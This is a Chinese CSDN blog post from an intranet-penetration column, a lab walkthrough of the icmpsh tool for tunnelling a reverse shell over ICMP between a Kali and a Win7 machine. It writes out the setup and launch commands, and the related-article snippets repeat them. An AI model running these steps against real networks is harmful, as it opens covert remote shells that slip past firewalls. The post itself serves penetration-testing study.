ICMP隧道---icmpsh工具玩法

最新推荐文章于 2024-04-30 17:15:06 发布
最新推荐文章于 2024-04-30 17:15:06 发布
阅读量893 收藏 1
点赞数 1
分类专栏: 内网渗透 文章标签: 网络 tcp/ip 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55793759/article/details/126214747
版权

在这里插入图片描述

前言
常常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽 ping数据包),实现不受限制的网络访问

利用ICMP协议反弹shell,Icmpsh工具

Icmpsh工具简单,便于携带,运行不需要管理员权限
下载地址为

https://github.com/inquisb/icmpsh

可使用git clone命令下载

在这里插入图片描述
安装 Python 的 impacket 类库,以对TCP、UDP、ICMP、ARP、IPv4、IPv6 SMB等协议进行访问

apt-get install python-impacket

在这里插入图片描述
因为icmpsh工具要代替系统本身的ping命令的应答程序,所以需要输入如下命令来关闭本地系统的ICMP应答(如果要恢复系统应答,则设置为0),否则Shell的运行会不稳定(表现为一直刷屏,无法进行交互输入)

sysctl -w net.ipv4.icmp_echo_ignore_all=1

在这里插入图片描述

输入"./run.sh"并运行,会提示输人目标的IP地址(目标主机的公网IP地址),输入"192.168.1.43"并按"回车"键,会自动给出需要在目标主机上运行的命令并开始监听,但是我这里显示有问题,不知道为啥

在这里插入图片描述
于是使用Icmpsh的python脚本运行

python icmpsh_m.py 192.168.53.135(kail)  192.168.53.128(win7)

在这里插入图片描述
然后在win7上执行命令

icmpsh.exe -t 192.168.53.135(kail)

在这里插入图片描述
kail上成功反弹shell

在这里插入图片描述

迷途羔羊pro
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
icmpsh.zip
05-17
内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。
【内网学习笔记】6、ICMP隧道工具使用
TeamsSix 的 CSDN 空间
04-07 720
1、介绍 在内网中,如果攻击者使用 HTTP、DNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping 数据包。 因此我们便可以将 TCP/UDP 数据封装到 ICMP 的 ping 数据包中,从而绕过防火墙的限制。 2、建立 ICMP 隧道工具 用于建立 ICMP 隧道工具常见有:ptunnel、icmpshicmptunnel 等 ptunnel ptunnel 全称 PingTunnel,Kali
利用icmpsh建立icmp隧道反弹shell
huayimy的博客
12-29 714
利用icmpsh建立icmp隧道反弹shell,安装pip2,安装impacket模块,raise ReadTimeoutError,Failed to build future
隧道工具Pingtunnel使用ICMP协议搭建隧道
qq_42430287的博客
03-24 386
1.环境搭建 windows10本机:192.168.126.1 kali攻击机:192.168.126.149 linux内网webserver服务器:192.168.126.157和192.168.33.129 内网windows7:192.168.33.33 2.安装Pingtunnel kali攻击机和webserver安装 apt-get install byacc apt-get i...
内网渗透系列:内网隧道icmpsh
闵行小鱼塘
04-10 1356
本文研究ICMP隧道的一个工具icmpsh
计算机网络教案11-ICMP和路由选择.docx
12-16
计算机网络教案11-ICMP和路由选择.docx
ICMP Shell-开源
05-01
ICMP Shell(ISH)是类似于telnet的协议。 它允许用户连接到远程主机,并仅使用ICMP来发送和接收数据,从而打开外壳。 ICMP Shell是用C语言编写的,用于UNIX环境。
ICMP Monitor-开源
05-02
使用InterNet控制消息协议(ICMP)“ ECHO”工具,监视多个主机,如果其中一些主机关闭,则通知管理员。
ICMP-Advanced-Development.rar_ICMP通信
09-24
ICMP高级编程。适合网络通信专业的学生。非常值得学习使用。可以运行出结果。
计算机网络实验 wireshark Cisco-packet-tracer
04-04
实验3 IP/ICMP 协议分析实验 实验4 TCP/UDP 协议分析实验 实验5 PacketTrace基本使用 实验6 交换机配置 实验7 VLAN基本配置 实验8 VLAN 主干道配置 实验9 路由器的基本配置 实验10 静态路由配置 实验11 RIP路由协议...
ICMP协议测试工具
08-26
本程序采用VC++ 6.0 设计完成,根据ICMP 协议原理设计网络模型和监听线程,对目标主机执行Ping 服务,是学习ICMP 协议的好例子
TCP/UDP/ICMP/IGMP发包工具
03-12
可以制作各种IP数据,自定义L2 Header、L3 Header和L4 Header等,包括MAC、IP包头、报文内容定制等,通过该工具对指定的地点发送设置的数据,用于各种网络性能、特殊报文处理等测试。
DNS与ICMP隧道资料
11-01
以前自己收集的一些DNS和ICMP隧道技术的文档, 非常有用, 包括源代码及文档资料, 欢迎下载
icmpsh建立ICMP隧道
大方子
01-27 4779
Kali:192.168.61.145 Win7:192.168.61.128 Kali上先下载icmpsh git clone https://github.com/inquisb/icmpsh.git 安装python-impacket apt-get install python-impacket 关闭Kali系统自己的ping回复(实验完成后,记得设回0) 然后进入icmpsh文件夹内执行 # python icmpsh_m.py [攻击机IP][目标IP] python icmpsh_m
icmp隧道--icmpsh
ddr12231的博客
09-24 278
本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 sysctl -w net.ipv4.icmp_echo_ighore_all=1 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 icmpsh.exe -t UbantuIP 详细命令 -t...
隐藏通信隧道ICMPSH
帅醉了的博客
03-22 705
内网渗透_建立icmp隧道 -t host :要向其发送ping请求的主机ip地址。此选项是必需的! -r:发送一个包含字符串“Test1234”的测试icmp请求,然后退出。这是用来测试连接的。 -d milliseconds:请求之间的延迟(毫秒) -o milliseconds:毫秒响应超时(毫秒)。如果没有及时收到回复,奴隶将增加一个空白计数器。如果计数器达到某个限制,则从机将退出。如果收...
沪深websocket level2/level1行情推送接入示例
04-28 400
【代码】沪深websocket level2/level1行情推送接入示例。
SD-WAN怎样保障网络稳定
TIANGEKUAJING的博客
04-25 567
随着企业网络的日益复杂,如何确保线路的稳定性和高效性成为了网络管理的一大挑战。尤其是在线路出现故障、质量下降或拥塞时,如何快速响应并切换到最佳线路,就显得尤为重要。SD-WAN,作为一种新型的网络架构,为用户提供了灵活应对各种网络问题的能力。
FR-TSN4206获得“时间敏感网络产业链名录计划”测试认证证书,TSN交换机助力智能工业发展
最新发布
fiberroad的博客
04-30 230
TSN技术,即时间敏感网络技术,已成为智能工业、自动驾驶等领域的核心。它通过时钟同步、数据调度等功能,确保低延迟、高可靠性的数据传输。为推动TSN技术在我国的发展,工业互联网产业联盟联合多家单位启动了“时间敏感网络产业链名录计划”。光路科技的FR-TSN4206交换机成功通过该计划认证
adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT 的详细解释
06-13
```adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT``` 是一个修改 iptables 规则的命令,它的含义如下: - ```-A```:表示添加(append)一个新的规则到规则链的末尾。 - ```INPUT```:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值